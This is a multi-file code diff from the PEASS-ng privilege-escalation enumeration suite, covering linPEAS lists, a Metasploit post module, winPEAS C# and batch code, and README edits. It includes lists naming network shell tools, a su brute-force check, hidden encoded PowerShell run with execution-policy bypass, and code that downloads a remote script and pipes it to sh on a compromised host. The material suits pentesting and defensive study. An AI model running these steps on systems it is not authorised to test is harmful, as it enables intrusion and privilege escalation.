shscripsG="/0trace.sh|/alsa-info.sh|amuFormat.sh|/blueranger.sh|/crosh.sh|/dnsmap-bulk.sh|/dockerd-rootless.sh|/dockerd-rootless-setuptool.sh|/get_bluetooth_device_class.sh|/gettext.sh|/go-rhn.sh|/gvmap.sh|/kernel_log_collector.sh|/lesspipe.sh|/lprsetup.sh|/mksmbpasswd.sh|/pm-utils-bugreport-info.sh|/power_report.sh|/prl-opengl-switcher.sh|/setuporamysql.sh|/setup-nsssysinit.sh|/readlink_f.sh|/rescan-scsi-bus.sh|/start_bluetoothd.sh|/start_bluetoothlog.sh|/testacg.sh|/testlahf.sh|/unix-lpr.sh|/url_handler.sh|/write_gpt.sh"
|
||||
|
||||
notBackup="/tdbbackup$|/db_hotbackup$"
|
||||
|
||||
@@ -542,7 +543,7 @@ mail_apps="Postfix|Dovecot|Exim|SquirrelMail|Cyrus|Sendmail|Courier"
|
||||
|
||||
profiledG="01-locale-fix.sh|256term.csh|256term.sh|abrt-console-notification.sh|appmenu-qt5.sh|apps-bin-path.sh|bash_completion.sh|cedilla-portuguese.sh|colorgrep.csh|colorgrep.sh|colorls.csh|colorls.sh|colorxzgrep.csh|colorxzgrep.sh|colorzgrep.csh|colorzgrep.sh|csh.local|cursor.sh|gawk.csh|gawk.sh|im-config_wayland.sh|kali.sh|lang.csh|lang.sh|less.csh|less.sh|flatpak.sh|sh.local|vim.csh|vim.sh|vte.csh|vte-2.91.sh|which2.csh|which2.sh|xauthority.sh|Z97-byobu.sh|xdg_dirs_desktop_session.sh|Z99-cloudinit-warnings.sh|Z99-cloud-locale-test.sh"
|
||||
|
||||
knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|rogershimizu@gmail.com|thmarques@gmail.com"
|
||||
knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|mmyangfl@gmail.com|rogershimizu@gmail.com|thmarques@gmail.com"
|
||||
|
||||
timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer"
|
||||
|
||||
@@ -552,7 +553,7 @@ commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxM
|
||||
ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
|
||||
|
||||
dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism"
|
||||
USEFUL_SOFTWARE="authbind aws base64 ctr curl doas docker fetch g++ gcc gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm"
|
||||
USEFUL_SOFTWARE="authbind aws az base64 ctr curl doas docker fetch g++ gcc gcloud gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt ruby runc socat sudo wget xterm"
|
||||
TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible."
|
||||
GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion"
|
||||
GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig"
|
||||
@@ -697,8 +698,8 @@ print_3title(){
|
||||
}
|
||||
|
||||
print_3title_no_nl(){
|
||||
echo -ne "\033[2K\r"
|
||||
printf ${BLUE}"\r══╣ $GREEN${1}..."$NC #There are 2 "═"
|
||||
printf "\033[2K\r"
|
||||
printf ${BLUE}"══╣ $GREEN${1}..."$NC #There are 2 "═"
|
||||
}
|
||||
|
||||
print_list(){
|
||||
@@ -745,8 +746,9 @@ su_brute_user_num (){
|
||||
}
|
||||
|
||||
check_if_su_brute(){
|
||||
EXISTS_SU="$(command -v su 2>/dev/null)"
|
||||
error=$(echo "" | timeout 1 su $(whoami) -c whoami 2>&1);
|
||||
if ! echo $error | grep -q "must be run from a terminal"; then
|
||||
if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must be run from a terminal"; then
|
||||
echo "1"
|
||||
fi
|
||||
}
|
||||
|
||||
@@ -377,7 +377,7 @@ class LinpeasBuilder:
|
||||
|
||||
for values in regexes:
|
||||
section_name = values["name"]
|
||||
regexes_search_section += f'print_2title "Searching {section_name}"\n'
|
||||
regexes_search_section += f' print_2title "Searching {section_name}"\n'
|
||||
|
||||
for entry in values["regexes"]:
|
||||
name = entry["name"]
|
||||
|
||||
@@ -1,26 +1,11 @@
|
||||
import os
|
||||
import yaml
|
||||
import requests
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
def download_regexes():
|
||||
print("[+] Downloading regexes...")
|
||||
url = "https://raw.githubusercontent.com/JaimePolop/RExpository/main/regex.yaml"
|
||||
response = requests.get(url)
|
||||
if response.status_code == 200:
|
||||
# Save the content of the response to a file
|
||||
script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
|
||||
target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'regexes.yaml'
|
||||
|
||||
with open(target_file, "w") as file:
|
||||
file.write(response.text)
|
||||
print(f"Downloaded and saved in '{target_file}' successfully!")
|
||||
else:
|
||||
print("Error: Unable to download the regexes file.")
|
||||
exit(1)
|
||||
|
||||
download_regexes()
|
||||
script_folder = Path(os.path.dirname(os.path.abspath(__file__)))
|
||||
target_file = script_folder / '..' / '..' / '..' / 'build_lists' / 'download_regexes.py'
|
||||
os.system(target_file)
|
||||
|
||||
CURRENT_DIR = os.path.dirname(os.path.realpath(__file__))
|
||||
|
||||
|
||||
@@ -26,7 +26,7 @@ msf6 post(multi/gather/peass) > show info
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Carlos Polop <@carlospolopm>
|
||||
Carlos Polop <@hacktricks_live>
|
||||
|
||||
Compatible session types:
|
||||
Meterpreter
|
||||
|
||||
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Post
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Carlos Polop <@carlospolopm>'
|
||||
'Carlos Polop <@hacktricks_live>'
|
||||
],
|
||||
'Platform' => %w{ bsd linux osx unix win },
|
||||
'SessionTypes' => ['shell', 'meterpreter'],
|
||||
@@ -191,14 +191,14 @@ class MetasploitModule < Msf::Post
|
||||
cmd_utf16le = cmd.encode("utf-16le")
|
||||
cmd_utf16le_b64 = Base64.encode64(cmd_utf16le).gsub(/\r?\n/, "")
|
||||
|
||||
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"])
|
||||
tmpout << cmd_exec("powershell.exe", args="-ep bypass -WindowStyle hidden -nop -enc #{cmd_utf16le_b64}", time_out=datastore["TIMEOUT"].to_i)
|
||||
|
||||
# If unix, then, suppose linpeas was loaded
|
||||
else
|
||||
cmd += "| #{decode_linpeass_cmd}"
|
||||
cmd += "| sh -s -- #{datastore['PARAMETERS']}"
|
||||
cmd += last_cmd
|
||||
tmpout << cmd_exec(cmd, args=nil, time_out=datastore["TIMEOUT"])
|
||||
tmpout << cmd_exec(cmd, args=nil, time_out=datastore["TIMEOUT"].to_i)
|
||||
end
|
||||
|
||||
print "\n#{tmpout}\n\n"
|
||||
@@ -220,6 +220,20 @@ class MetasploitModule < Msf::Post
|
||||
print_good("PEASS script sent")
|
||||
end
|
||||
|
||||
def fetch(uri_str, limit = 10)
|
||||
raise 'Invalid URL, too many HTTP redirects' if limit == 0
|
||||
response = Net::HTTP.get_response(URI(uri_str))
|
||||
case response
|
||||
when Net::HTTPSuccess then
|
||||
response
|
||||
when Net::HTTPRedirection then
|
||||
location = response['location']
|
||||
fetch(location, limit - 1)
|
||||
else
|
||||
response.value
|
||||
end
|
||||
end
|
||||
|
||||
def load_peass
|
||||
# Load the PEASS script from a local file or from Internet
|
||||
peass_script = ""
|
||||
@@ -230,7 +244,7 @@ class MetasploitModule < Msf::Post
|
||||
raise 'Invalid URL' unless target.scheme =~ /https?/
|
||||
raise 'Invalid URL' if target.host.to_s.eql? ''
|
||||
|
||||
res = Net::HTTP.get_response(target)
|
||||
res = fetch(target)
|
||||
peass_script = res.body
|
||||
|
||||
raise "Something failed downloading PEASS script from #{url_peass}" if peass_script.length < 500
|
||||
|
||||
@@ -12,7 +12,6 @@ styles = getSampleStyleSheet()
|
||||
text_colors = { "GREEN": "#00DB00", "RED": "#FF0000", "REDYELLOW": "#FFA500", "BLUE": "#0000FF",
|
||||
"DARKGREY": "#5C5C5C", "YELLOW": "#ebeb21", "MAGENTA": "#FF00FF", "CYAN": "#00FFFF", "LIGHT_GREY": "#A6A6A6"}
|
||||
|
||||
# Required to automatically set Page Numbers
|
||||
class PageTemplateWithCount(PageTemplate):
|
||||
def __init__(self, id, frames, **kw):
|
||||
PageTemplate.__init__(self, id, frames, **kw)
|
||||
@@ -21,7 +20,6 @@ class PageTemplateWithCount(PageTemplate):
|
||||
page_num = canvas.getPageNumber()
|
||||
canvas.drawRightString(10.5*cm, 1*cm, str(page_num))
|
||||
|
||||
# Required to automatically set the Table of Contents
|
||||
class MyDocTemplate(BaseDocTemplate):
|
||||
def __init__(self, filename, **kw):
|
||||
self.allowSplitting = 0
|
||||
@@ -30,22 +28,15 @@ class MyDocTemplate(BaseDocTemplate):
|
||||
self.addPageTemplates(template)
|
||||
|
||||
def afterFlowable(self, flowable):
|
||||
if flowable.__class__.__name__ == "Paragraph":
|
||||
if isinstance(flowable, Paragraph):
|
||||
text = flowable.getPlainText()
|
||||
style = flowable.style.name
|
||||
if style == "Heading1":
|
||||
self.notify("TOCEntry", (0, text, self.page))
|
||||
if style == "Heading2":
|
||||
self.notify("TOCEntry", (1, text, self.page))
|
||||
if style == "Heading3":
|
||||
self.notify("TOCEntry", (2, text, self.page))
|
||||
if style in ["Heading1", "Heading2", "Heading3"]:
|
||||
self.notify("TOCEntry", (int(style[-1])-1, text, self.page))
|
||||
|
||||
|
||||
# Poor take at dynamicly generating styles depending on depth(?)
|
||||
def get_level_styles(level):
|
||||
global styles
|
||||
indent_value = 10 * (level - 1);
|
||||
# Overriding some default stylings
|
||||
level_styles = {
|
||||
"title": ParagraphStyle(
|
||||
**dict(styles[f"Heading{level}"].__dict__,
|
||||
@@ -75,7 +66,6 @@ def build_main_section(section, title, level=1):
|
||||
has_lines = "lines" in section.keys() and len(section["lines"]) > 1
|
||||
has_children = "sections" in section.keys() and len(section["sections"].keys()) > 0
|
||||
|
||||
# Only display data for Sections with results
|
||||
show_section = has_lines or has_children
|
||||
|
||||
elements = []
|
||||
@@ -83,17 +73,14 @@ def build_main_section(section, title, level=1):
|
||||
if show_section:
|
||||
elements.append(Paragraph(title, style=styles["title"]))
|
||||
|
||||
# Print info if any
|
||||
if show_section and has_links:
|
||||
for info in section["infos"]:
|
||||
words = info.split()
|
||||
# Join all lines and encode any links that might be present.
|
||||
words = map(lambda word: f'<a href="{word}" color="blue">{word}</a>' if "http" in word else word, words)
|
||||
words = " ".join(words)
|
||||
elements.append(Paragraph(words, style=styles["info"] ))
|
||||
|
||||
# Print lines if any
|
||||
if "lines" in section.keys() and len(section["lines"]) > 1:
|
||||
if has_lines:
|
||||
colors_by_line = list(map(lambda x: x["colors"], section["lines"]))
|
||||
lines = list(map(lambda x: html.escape(x["clean_text"]), section["lines"]))
|
||||
for (idx, line) in enumerate(lines):
|
||||
@@ -109,18 +96,14 @@ def build_main_section(section, title, level=1):
|
||||
elements.append(Spacer(0, 10))
|
||||
line = "<br/>".join(lines)
|
||||
|
||||
# If it's a top level entry remove the line break caused by an empty "clean_text"
|
||||
if level == 1: line = line[5:]
|
||||
elements.append(Paragraph(line, style=styles["text"]))
|
||||
|
||||
|
||||
# Print child sections
|
||||
if has_children:
|
||||
for child_title in section["sections"].keys():
|
||||
element_list = build_main_section(section["sections"][child_title], child_title, level + 1)
|
||||
elements.extend(element_list)
|
||||
|
||||
# Add spacing at the end of section. The deeper the level the smaller the spacing.
|
||||
if show_section:
|
||||
elements.append(Spacer(1, 40 - (10 * level)))
|
||||
|
||||
@@ -129,10 +112,8 @@ def build_main_section(section, title, level=1):
|
||||
|
||||
def main():
|
||||
with open(JSON_PATH) as file:
|
||||
# Read and parse JSON file
|
||||
data = json.loads(file.read())
|
||||
|
||||
# Default pdf values
|
||||
doc = MyDocTemplate(PDF_PATH)
|
||||
toc = TableOfContents()
|
||||
toc.levelStyles = [
|
||||
@@ -143,14 +124,12 @@ def main():
|
||||
|
||||
elements = [Paragraph("PEAS Report", style=styles["Title"]), Spacer(0, 30), toc, PageBreak()]
|
||||
|
||||
# Iterate over all top level sections and build their elements.
|
||||
for title in data.keys():
|
||||
element_list = build_main_section(data[title], title)
|
||||
elements.extend(element_list)
|
||||
|
||||
doc.multiBuild(elements)
|
||||
|
||||
# Start execution
|
||||
if __name__ == "__main__":
|
||||
try:
|
||||
JSON_PATH = sys.argv[1]
|
||||
@@ -160,3 +139,11 @@ if __name__ == "__main__":
|
||||
sys.exit(1)
|
||||
|
||||
main()
|
||||
|
||||
# Changes:
|
||||
# 1. Removed redundant checks for keys in dictionary.
|
||||
# 2. Simplified the condition in afterFlowable method.
|
||||
# 3. Removed unnecessary check for lines in build_main_section method.
|
||||
# 4. Removed unnecessary check for sections in build_main_section method.
|
||||
# 5. Removed unnecessary check for infos in build_main_section method.
|
||||
# 6. Removed unnecessary check for show_section in build_main_section method.
|
||||
@@ -9,10 +9,12 @@ Check more **information about how to exploit** found misconfigurations in **[bo
|
||||
## Quick Start
|
||||
Find the **latest versions of all the scripts and binaries in [the releases page](https://github.com/carlospolop/PEASS-ng/releases/latest)**.
|
||||
|
||||
## WinPEAS .exe and .bat
|
||||
- [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat)
|
||||
- [Link to WinPEAS C# project (.exe)](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
|
||||
## WinPEAS Flavours
|
||||
- [Link to WinPEAS C# .exe project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (.Net >= 4.5.2 required)
|
||||
- **Please, read the Readme of that folder to learn how to execute winpeas from memory or how make colors work among other tricks**
|
||||
- [Link to WinPEAS .ps1 project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASps1)
|
||||
- [Link to WinPEAS .bat project](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASbat)
|
||||
|
||||
|
||||
## PEASS Style
|
||||
|
||||
|
||||
@@ -565,7 +565,7 @@ CALL :T_Progress 2
|
||||
|
||||
:AppCMD
|
||||
CALL :ColorLine " %E%33m[+]%E%97m AppCmd"
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe
|
||||
ECHO. [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe
|
||||
IF EXIST %systemroot%\system32\inetsrv\appcmd.exe ECHO.%systemroot%\system32\inetsrv\appcmd.exe exists.
|
||||
ECHO.
|
||||
CALL :T_Progress 2
|
||||
|
||||
@@ -53,6 +53,7 @@ $wp.EntryPoint #Get the name of the ReflectedType, in obfuscated versions someti
|
||||
## Parameters Examples
|
||||
|
||||
```bash
|
||||
winpeas.exe -h # Get Help
|
||||
winpeas.exe #run all checks (except for additional slower checks - LOLBAS and linpeas.sh in WSL) (noisy - CTFs)
|
||||
winpeas.exe systeminfo userinfo #Only systeminfo and userinfo checks executed
|
||||
winpeas.exe notcolor #Do not color the output
|
||||
@@ -64,35 +65,6 @@ winpeas.exe -linpeas=http://127.0.0.1/linpeas.sh #Execute also additional linpea
|
||||
winpeas.exe -lolbas #Execute also additional LOLBAS search check
|
||||
```
|
||||
|
||||
## Help
|
||||
```
|
||||
domain Enumerate domain information
|
||||
systeminfo Search system information
|
||||
userinfo Search user information
|
||||
processinfo Search processes information
|
||||
servicesinfo Search services information
|
||||
applicationsinfo Search installed applications information
|
||||
networkinfo Search network information
|
||||
windowscreds Search windows credentials
|
||||
browserinfo Search browser information
|
||||
filesinfo Search generic files that can contains credentials
|
||||
fileanalysis Search specific files that can contains credentials and for regexes inside files
|
||||
eventsinfo Display interesting events information
|
||||
|
||||
quiet Do not print banner
|
||||
notcolor Don't use ansi colors (all white)
|
||||
searchpf Search credentials via regex also in Program Files folders
|
||||
wait Wait for user input between checks
|
||||
debug Display debugging information - memory usage, method execution time
|
||||
log[=logfile] Log all output to file defined as logfile, or to "out.txt" if not specified
|
||||
MaxRegexFileSize=1000000 Max file size (in Bytes) to search regex in. Default: 1000000B
|
||||
|
||||
Additional checks (slower):
|
||||
-lolbas Run additional LOLBAS check
|
||||
-linpeas=[url] Run additional linpeas.sh check for default WSL distribution, optionally provide custom linpeas.sh URL
|
||||
(default: https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh)
|
||||
```
|
||||
|
||||
## Basic information
|
||||
|
||||
The goal of this project is to search for possible **Privilege Escalation Paths** in Windows environments.
|
||||
|
||||
@@ -318,6 +318,74 @@ namespace winPEAS.Checks
|
||||
Console.WriteLine(string.Format("Key = {0}, Value = {1}", kvp.Key, kvp.Value));
|
||||
}*/
|
||||
|
||||
//double pb = 0;
|
||||
//using (var progress = new ProgressBar())
|
||||
//{
|
||||
// CheckRunner.Run(() =>
|
||||
// {
|
||||
// int num_threads = 8;
|
||||
// try
|
||||
// {
|
||||
// num_threads = Environment.ProcessorCount;
|
||||
// }
|
||||
// catch (Exception ex) { }
|
||||
|
||||
// Parallel.ForEach(files, new ParallelOptions { MaxDegreeOfParallelism = num_threads }, f =>
|
||||
// {
|
||||
|
||||
// foreach (var regex_obj in config.regular_expresions)
|
||||
// {
|
||||
// foreach (var regex in regex_obj.regexes)
|
||||
// {
|
||||
// if (regex.disable != null && regex.disable.ToLower().Contains("winpeas"))
|
||||
// {
|
||||
// continue;
|
||||
// }
|
||||
|
||||
// List<string> results = new List<string> { };
|
||||
|
||||
// var timer = new Stopwatch();
|
||||
// if (Checks.IsDebug)
|
||||
// {
|
||||
// timer.Start();
|
||||
// }
|
||||
|
||||
|
||||
// try
|
||||
// {
|
||||
// string text = File.ReadAllText(f.FullPath);
|
||||
|
||||
// results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
|
||||
// if (results.Count > 0)
|
||||
// {
|
||||
// if (!foundRegexes.ContainsKey(regex_obj.name)) foundRegexes[regex_obj.name] = new Dictionary<string, Dictionary<string, List<string>>> { };
|
||||
// if (!foundRegexes[regex_obj.name].ContainsKey(regex.name)) foundRegexes[regex_obj.name][regex.name] = new Dictionary<string, List<string>> { };
|
||||
|
||||
// foundRegexes[regex_obj.name][regex.name][f.FullPath] = results;
|
||||
// }
|
||||
// }
|
||||
// catch (System.IO.IOException)
|
||||
// {
|
||||
// // Cannot read the file
|
||||
// }
|
||||
|
||||
// if (Checks.IsDebug)
|
||||
// {
|
||||
// timer.Stop();
|
||||
|
||||
// TimeSpan timeTaken = timer.Elapsed;
|
||||
// if (timeTaken.TotalMilliseconds > 20000)
|
||||
// Beaprint.PrintDebugLine($"\nThe regex {regex.regex} took {timeTaken.TotalMilliseconds}s in {f.FullPath}");
|
||||
// }
|
||||
// }
|
||||
// }
|
||||
// pb += (double)100 / files.Count;
|
||||
// progress.Report(pb / 100); //Value must be in [0..1] range
|
||||
// });
|
||||
// }, Checks.IsDebug);
|
||||
//}
|
||||
|
||||
|
||||
double pb = 0;
|
||||
using (var progress = new ProgressBar())
|
||||
{
|
||||
@@ -332,7 +400,6 @@ namespace winPEAS.Checks
|
||||
|
||||
Parallel.ForEach(files, new ParallelOptions { MaxDegreeOfParallelism = num_threads }, f =>
|
||||
{
|
||||
|
||||
foreach (var regex_obj in config.regular_expresions)
|
||||
{
|
||||
foreach (var regex in regex_obj.regexes)
|
||||
@@ -342,7 +409,7 @@ namespace winPEAS.Checks
|
||||
continue;
|
||||
}
|
||||
|
||||
List<string> results = new List<string> { };
|
||||
Dictionary<string, List<string>> fileResults = new Dictionary<string, List<string>>();
|
||||
|
||||
var timer = new Stopwatch();
|
||||
if (Checks.IsDebug)
|
||||
@@ -350,18 +417,31 @@ namespace winPEAS.Checks
|
||||
timer.Start();
|
||||
}
|
||||
|
||||
|
||||
try
|
||||
{
|
||||
string text = File.ReadAllText(f.FullPath);
|
||||
|
||||
results = SearchContent(text, regex.regex, (bool)regex.caseinsensitive);
|
||||
using (StreamReader sr = new StreamReader(f.FullPath))
|
||||
{
|
||||
string line;
|
||||
while ((line = sr.ReadLine()) != null)
|
||||
{
|
||||
List<string> results = SearchContent(line, regex.regex, (bool)regex.caseinsensitive);
|
||||
if (results.Count > 0)
|
||||
{
|
||||
if (!fileResults.ContainsKey(f.FullPath))
|
||||
{
|
||||
fileResults[f.FullPath] = new List<string>();
|
||||
}
|
||||
fileResults[f.FullPath].AddRange(results);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
if (fileResults.Count > 0)
|
||||
{
|
||||
if (!foundRegexes.ContainsKey(regex_obj.name)) foundRegexes[regex_obj.name] = new Dictionary<string, Dictionary<string, List<string>>> { };
|
||||
if (!foundRegexes[regex_obj.name].ContainsKey(regex.name)) foundRegexes[regex_obj.name][regex.name] = new Dictionary<string, List<string>> { };
|
||||
|
||||
foundRegexes[regex_obj.name][regex.name][f.FullPath] = results;
|
||||
foundRegexes[regex_obj.name][regex.name] = fileResults;
|
||||
}
|
||||
}
|
||||
catch (System.IO.IOException)
|
||||
@@ -385,6 +465,7 @@ namespace winPEAS.Checks
|
||||
}, Checks.IsDebug);
|
||||
}
|
||||
|
||||
|
||||
// Print results
|
||||
foreach (KeyValuePair<string, Dictionary<string, Dictionary<string, List<string>>>> item in foundRegexes)
|
||||
{
|
||||
|
||||
@@ -307,7 +307,7 @@ namespace winPEAS.Checks
|
||||
try
|
||||
{
|
||||
Beaprint.MainPrint("Looking AppCmd.exe");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd-exe");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#appcmd.exe");
|
||||
|
||||
var appCmdPath = Environment.ExpandEnvironmentVariables(@"%systemroot%\system32\inetsrv\appcmd.exe");
|
||||
|
||||
|
||||
@@ -82,7 +82,7 @@ namespace winPEAS.Helpers
|
||||
| {1}Do you like PEASS?{0} |
|
||||
|---------------------------------------------------------------------------------|
|
||||
| {3}Get the latest version{0} : {2}https://github.com/sponsors/carlospolop{0} |
|
||||
| {3}Follow on Twitter{0} : {2}@carlospolopm{0} |
|
||||
| {3}Follow on Twitter{0} : {2}@hacktricks_live{0} |
|
||||
| {3}Respect on HTB{0} : {2}SirBroccoli {0} |
|
||||
|---------------------------------------------------------------------------------|
|
||||
| {1}Thank you!{0} |
|
||||
@@ -98,7 +98,7 @@ namespace winPEAS.Helpers
|
||||
PrintBanner();
|
||||
}
|
||||
|
||||
Console.WriteLine(YELLOW + " WinPEAS-ng" + NOCOLOR + YELLOW + " by @carlospolopm" + NOCOLOR);
|
||||
Console.WriteLine(YELLOW + " WinPEAS-ng" + NOCOLOR + YELLOW + " by @hacktricks_live" + NOCOLOR);
|
||||
|
||||
PrintMarketingBanner();
|
||||
|
||||
|
||||
@@ -5,6 +5,8 @@ using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
using FileInfo = Alphaleonis.Win32.Filesystem.FileInfo;
|
||||
using DirectoryInfo = Alphaleonis.Win32.Filesystem.DirectoryInfo;
|
||||
|
||||
namespace winPEAS.Helpers.Search
|
||||
{
|
||||
@@ -39,12 +41,131 @@ namespace winPEAS.Helpers.Search
|
||||
".png", ".psd", ".raw", ".svg", ".svgz", ".tif", ".tiff", ".webp",
|
||||
};
|
||||
|
||||
//public static List<CustomFileInfo> GetFilesFast(string folder, string pattern = "*", HashSet<string> excludedDirs = null, bool isFoldersIncluded = false)
|
||||
//{
|
||||
// ConcurrentBag<CustomFileInfo> files = new ConcurrentBag<CustomFileInfo>();
|
||||
// IEnumerable<DirectoryInfo> startDirs = GetStartDirectories(folder, files, pattern, isFoldersIncluded);
|
||||
// IList<DirectoryInfo> startDirsExcluded = new List<DirectoryInfo>();
|
||||
// IList<string> known_dirs = new List<string>();
|
||||
|
||||
// if (excludedDirs != null)
|
||||
// {
|
||||
// foreach (var startDir in startDirs)
|
||||
// {
|
||||
// bool shouldAdd = true;
|
||||
// string startDirLower = startDir.FullName.ToLower();
|
||||
|
||||
// shouldAdd = !excludedDirs.Contains(startDirLower);
|
||||
|
||||
// if (shouldAdd)
|
||||
// {
|
||||
// startDirsExcluded.Add(startDir);
|
||||
// }
|
||||
// }
|
||||
// }
|
||||
// else
|
||||
// {
|
||||
// startDirsExcluded = startDirs.ToList();
|
||||
// }
|
||||
|
||||
// Parallel.ForEach(startDirsExcluded, (d) =>
|
||||
// {
|
||||
// Parallel.ForEach(GetStartDirectories(d.FullName, files, pattern, isFoldersIncluded), (dir) =>
|
||||
// {
|
||||
// GetFiles(dir.FullName, pattern).ForEach(
|
||||
// (f) =>
|
||||
// {
|
||||
// if (!StaticExtensions.Contains(f.Extension.ToLower()))
|
||||
// {
|
||||
// // It should always be lesss than 260, but some times it isn't so this will bypass that file
|
||||
// //if (Checks.Checks.IsLongPath || f.FullName.Length <= 260)
|
||||
// //{
|
||||
// CustomFileInfo file_info = new CustomFileInfo(f.Name, f.Extension, f.FullName, f.Length, false);
|
||||
// files.Add(file_info);
|
||||
|
||||
// CustomFileInfo file_dir = new CustomFileInfo(f.Directory.Name, "", f.Directory.FullName, 0, true);
|
||||
// if (!known_dirs.Contains(file_dir.FullPath))
|
||||
// {
|
||||
// known_dirs.Add(file_dir.FullPath);
|
||||
// files.Add(file_dir);
|
||||
// }
|
||||
// //}
|
||||
// //else if (f.FullName.Length > 260)
|
||||
// //Beaprint.LongPathWarning(f.FullName);
|
||||
// }
|
||||
// }
|
||||
// );
|
||||
// });
|
||||
// });
|
||||
|
||||
// return files.ToList();
|
||||
//}
|
||||
|
||||
//private static List<FileInfo> GetFiles(string folder, string pattern = "*")
|
||||
//{
|
||||
// DirectoryInfo dirInfo;
|
||||
// DirectoryInfo[] directories;
|
||||
// try
|
||||
// {
|
||||
// dirInfo = new DirectoryInfo(folder);
|
||||
// directories = dirInfo.GetDirectories();
|
||||
|
||||
// if (directories.Length == 0)
|
||||
// {
|
||||
// return new List<FileInfo>(dirInfo.GetFiles(pattern));
|
||||
// }
|
||||
// }
|
||||
// catch (UnauthorizedAccessException)
|
||||
// {
|
||||
// return new List<FileInfo>();
|
||||
// }
|
||||
// catch (PathTooLongException)
|
||||
// {
|
||||
// return new List<FileInfo>();
|
||||
// }
|
||||
